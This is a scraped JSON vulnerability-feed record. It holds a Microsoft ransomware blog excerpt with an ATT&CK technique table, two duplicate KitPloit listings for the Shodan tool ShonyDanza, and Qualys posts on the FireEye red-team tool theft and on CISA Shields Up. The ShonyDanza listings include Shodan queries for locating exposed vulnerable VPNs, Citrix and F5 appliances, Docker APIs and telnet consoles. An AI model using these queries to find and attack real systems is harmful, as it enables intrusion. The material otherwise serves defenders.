Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevtutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security software using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", 
"title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:27", "description": "[](<https://3.bp.blogspot.com/-HfvtRTCYnTM/YZ3QJbhSs3I/AAAAAAAA4AU/kC3BBy581dgTiAKCIDOlmGtohgCXuQhlgCK4BGAYYCw/s1600/ShonyDanza_1_shonydanza_demo-780791.gif>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for 
searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of / \"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n 
#OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-01T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-01T20:30:00", "id": "KITPLOIT:4421457840699592233", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:01:24", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEjG7AfpHcNjkzZMtvplE2bYVsPCgZ1wyo5jesct_CsGBPhciWCUWFhqC4SLSNboL7iPTWtI0RpGyHZQCbSylFXDC1py1fWqO3vCbpVdYDcHTRT2va2EUO1Vp9dPAgOP6FamNin8VZZdxS42vTbMMddcAUnuN5AAWWwfJDH2pfpmQhjA5RV51QbUk8BqJQ=s586>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of /\"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 
1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-27T20:30:00", "id": "KITPLOIT:4707889613618662864", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to_01477721372.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-01-06T00:22:53", "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020**: FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) the theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. 
However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. 
To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus which uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built in to many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect for preventing the usage of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to make the determination if the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. 
\n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop 
Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| Local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for the CVEs published by FireEye. You can search for these QIDs in the VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith the VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of trends for these vulnerabilities in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. 
\n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 
'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. 
Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to) ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc). In addition, if a patch is not needed by a specific asset the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that miss at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. 
These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on "Setting" icon in "Dashboard" section.\n * Select "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse the JSON file to import.\n * Click on "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. 
\n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "cvss3": {}, "published": "2020-12-10T00:48:29", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T01:27:17", "description": "**_CISA has created Shields Up as a response to the Russian invasion of Ukraine. Qualys is responding with additional security, monitoring and governance measures. 
This blog details how and what our enterprise customers can do to immediately strengthen their security posture and meet CISA\u2019s recommendations._**\n\nWith the invasion of Ukraine by Russia, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) has created a [program titled Shields Up](<https://www.cisa.gov/shields-up>) and provided specific guidance to all organizations. The Russian government has used cyber operations as a key component of force projection in the past and has targeted critical infrastructure to destabilize a government\u2019s response capabilities. Critical infrastructure can include supply chain (including software supply chain), power, utilities, communications, transportation, and government and military organizations.\n\n### Protecting Customer Data on Qualys Cloud Platform\n\nQualys is strongly committed to the security of our customers and their data. In addition to proactive risk mitigation with continuous patch and configuration management, we continually monitor all our environments for any indication of active threats, exploits and compromises. We hold our platforms to the highest security and compliance mandates, such as [FedRAMP](<https://blog.qualys.com/product-tech/2022/02/24/meet-fedramp-compliance-with-qualys-cloud-platform>). However, given the heightened risk environment around the globe, the Qualys Security and Engineering teams have been at a heightened state of vigilance in recent weeks. We continuously monitor our internal systems in this amplified threat environment. We are working with our security partners to access the latest threat intel. 
